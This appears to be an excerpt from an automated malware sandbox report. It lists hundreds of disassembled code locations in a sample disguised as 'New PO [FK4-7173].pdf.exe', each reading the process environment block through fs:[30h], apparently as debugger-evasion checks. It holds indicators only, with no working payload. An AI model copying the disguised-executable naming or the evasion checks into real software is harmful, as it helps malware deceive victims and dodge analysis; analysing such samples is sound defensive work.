                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D437C mov eax, dword ptr fs:[00000030h]4_2_011D437C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0120634F mov eax, dword ptr fs:[00000030h]4_2_0120634F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01128397 mov eax, dword ptr fs:[00000030h]4_2_01128397
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01128397 mov eax, dword ptr fs:[00000030h]4_2_01128397
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01128397 mov eax, dword ptr fs:[00000030h]4_2_01128397
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E388 mov eax, dword ptr fs:[00000030h]4_2_0112E388
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E388 mov eax, dword ptr fs:[00000030h]4_2_0112E388
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E388 mov eax, dword ptr fs:[00000030h]4_2_0112E388
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115438F mov eax, dword ptr fs:[00000030h]4_2_0115438F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115438F mov eax, dword ptr fs:[00000030h]4_2_0115438F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE3DB mov eax, dword ptr fs:[00000030h]4_2_011DE3DB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE3DB mov eax, dword ptr fs:[00000030h]4_2_011DE3DB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE3DB mov ecx, dword ptr fs:[00000030h]4_2_011DE3DB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE3DB mov eax, dword ptr fs:[00000030h]4_2_011DE3DB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D43D4 mov eax, dword ptr fs:[00000030h]4_2_011D43D4
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D43D4 mov eax, dword ptr fs:[00000030h]4_2_011D43D4
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EC3CD mov eax, dword ptr fs:[00000030h]4_2_011EC3CD
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011383C0 mov eax, dword ptr fs:[00000030h]4_2_011383C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011383C0 mov eax, dword ptr fs:[00000030h]4_2_011383C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011383C0 mov eax, dword ptr fs:[00000030h]4_2_011383C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011383C0 mov eax, dword ptr fs:[00000030h]4_2_011383C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B63C0 mov eax, dword ptr fs:[00000030h]4_2_011B63C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E3F0 mov eax, dword ptr fs:[00000030h]4_2_0114E3F0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E3F0 mov eax, dword ptr fs:[00000030h]4_2_0114E3F0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E3F0 mov eax, dword ptr fs:[00000030h]4_2_0114E3F0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011663FF mov eax, dword ptr fs:[00000030h]4_2_011663FF
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112823B mov eax, dword ptr fs:[00000030h]4_2_0112823B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112A250 mov eax, dword ptr fs:[00000030h]4_2_0112A250
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01136259 mov eax, dword ptr fs:[00000030h]4_2_01136259
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EA250 mov eax, dword ptr fs:[00000030h]4_2_011EA250
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EA250 mov eax, dword ptr fs:[00000030h]4_2_011EA250
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B8243 mov eax, dword ptr fs:[00000030h]4_2_011B8243
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B8243 mov ecx, dword ptr fs:[00000030h]4_2_011B8243
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01134260 mov eax, dword ptr fs:[00000030h]4_2_01134260
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01134260 mov eax, dword ptr fs:[00000030h]4_2_01134260
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01134260 mov eax, dword ptr fs:[00000030h]4_2_01134260
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112826B mov eax, dword ptr fs:[00000030h]4_2_0112826B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0120625D mov eax, dword ptr fs:[00000030h]4_2_0120625D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E284 mov eax, dword ptr fs:[00000030h]4_2_0116E284
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E284 mov eax, dword ptr fs:[00000030h]4_2_0116E284
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B0283 mov eax, dword ptr fs:[00000030h]4_2_011B0283
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B0283 mov eax, dword ptr fs:[00000030h]4_2_011B0283
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B0283 mov eax, dword ptr fs:[00000030h]4_2_011B0283
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011402A0 mov eax, dword ptr fs:[00000030h]4_2_011402A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011402A0 mov eax, dword ptr fs:[00000030h]4_2_011402A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov eax, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov ecx, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov eax, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov eax, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov eax, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov eax, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A2C3 mov eax, dword ptr fs:[00000030h]4_2_0113A2C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A2C3 mov eax, dword ptr fs:[00000030h]4_2_0113A2C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A2C3 mov eax, dword ptr fs:[00000030h]4_2_0113A2C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A2C3 mov eax, dword ptr fs:[00000030h]4_2_0113A2C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A2C3 mov eax, dword ptr fs:[00000030h]4_2_0113A2C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011402E1 mov eax, dword ptr fs:[00000030h]4_2_011402E1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011402E1 mov eax, dword ptr fs:[00000030h]4_2_011402E1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011402E1 mov eax, dword ptr fs:[00000030h]4_2_011402E1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_012062D6 mov eax, dword ptr fs:[00000030h]4_2_012062D6
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C6500 mov eax, dword ptr fs:[00000030h]4_2_011C6500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E53E mov eax, dword ptr fs:[00000030h]4_2_0115E53E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E53E mov eax, dword ptr fs:[00000030h]4_2_0115E53E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E53E mov eax, dword ptr fs:[00000030h]4_2_0115E53E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E53E mov eax, dword ptr fs:[00000030h]4_2_0115E53E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E53E mov eax, dword ptr fs:[00000030h]4_2_0115E53E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01138550 mov eax, dword ptr fs:[00000030h]4_2_01138550
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01138550 mov eax, dword ptr fs:[00000030h]4_2_01138550
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116656A mov eax, dword ptr fs:[00000030h]4_2_0116656A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116656A mov eax, dword ptr fs:[00000030h]4_2_0116656A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116656A mov eax, dword ptr fs:[00000030h]4_2_0116656A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E59C mov eax, dword ptr fs:[00000030h]4_2_0116E59C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01132582 mov eax, dword ptr fs:[00000030h]4_2_01132582
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01132582 mov ecx, dword ptr fs:[00000030h]4_2_01132582
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01164588 mov eax, dword ptr fs:[00000030h]4_2_01164588
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011545B1 mov eax, dword ptr fs:[00000030h]4_2_011545B1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011545B1 mov eax, dword ptr fs:[00000030h]4_2_011545B1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B05A7 mov eax, dword ptr fs:[00000030h]4_2_011B05A7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B05A7 mov eax, dword ptr fs:[00000030h]4_2_011B05A7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B05A7 mov eax, dword ptr fs:[00000030h]4_2_011B05A7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011365D0 mov eax, dword ptr fs:[00000030h]4_2_011365D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A5D0 mov eax, dword ptr fs:[00000030h]4_2_0116A5D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A5D0 mov eax, dword ptr fs:[00000030h]4_2_0116A5D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E5CF mov eax, dword ptr fs:[00000030h]4_2_0116E5CF
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E5CF mov eax, dword ptr fs:[00000030h]4_2_0116E5CF
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011325E0 mov eax, dword ptr fs:[00000030h]4_2_011325E0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116C5ED mov eax, dword ptr fs:[00000030h]4_2_0116C5ED
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116C5ED mov eax, dword ptr fs:[00000030h]4_2_0116C5ED
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01168402 mov eax, dword ptr fs:[00000030h]4_2_01168402
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01168402 mov eax, dword ptr fs:[00000030h]4_2_01168402
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01168402 mov eax, dword ptr fs:[00000030h]4_2_01168402
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A430 mov eax, dword ptr fs:[00000030h]4_2_0116A430
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E420 mov eax, dword ptr fs:[00000030h]4_2_0112E420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E420 mov eax, dword ptr fs:[00000030h]4_2_0112E420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E420 mov eax, dword ptr fs:[00000030h]4_2_0112E420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112C427 mov eax, dword ptr fs:[00000030h]4_2_0112C427
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EA456 mov eax, dword ptr fs:[00000030h]4_2_011EA456
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112645D mov eax, dword ptr fs:[00000030h]4_2_0112645D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115245A mov eax, dword ptr fs:[00000030h]4_2_0115245A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115A470 mov eax, dword ptr fs:[00000030h]4_2_0115A470
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115A470 mov eax, dword ptr fs:[00000030h]4_2_0115A470
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115A470 mov eax, dword ptr fs:[00000030h]4_2_0115A470
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BC460 mov ecx, dword ptr fs:[00000030h]4_2_011BC460
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EA49A mov eax, dword ptr fs:[00000030h]4_2_011EA49A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011644B0 mov ecx, dword ptr fs:[00000030h]4_2_011644B0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BA4B0 mov eax, dword ptr fs:[00000030h]4_2_011BA4B0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011364AB mov eax, dword ptr fs:[00000030h]4_2_011364AB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011304E5 mov ecx, dword ptr fs:[00000030h]4_2_011304E5
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01130710 mov eax, dword ptr fs:[00000030h]4_2_01130710
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01160710 mov eax, dword ptr fs:[00000030h]4_2_01160710
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116C700 mov eax, dword ptr fs:[00000030h]4_2_0116C700
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116273C mov eax, dword ptr fs:[00000030h]4_2_0116273C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116273C mov ecx, dword ptr fs:[00000030h]4_2_0116273C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116273C mov eax, dword ptr fs:[00000030h]4_2_0116273C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AC730 mov eax, dword ptr fs:[00000030h]4_2_011AC730
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116C720 mov eax, dword ptr fs:[00000030h]4_2_0116C720
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116C720 mov eax, dword ptr fs:[00000030h]4_2_0116C720
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01130750 mov eax, dword ptr fs:[00000030h]4_2_01130750
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BE75D mov eax, dword ptr fs:[00000030h]4_2_011BE75D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172750 mov eax, dword ptr fs:[00000030h]4_2_01172750
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172750 mov eax, dword ptr fs:[00000030h]4_2_01172750
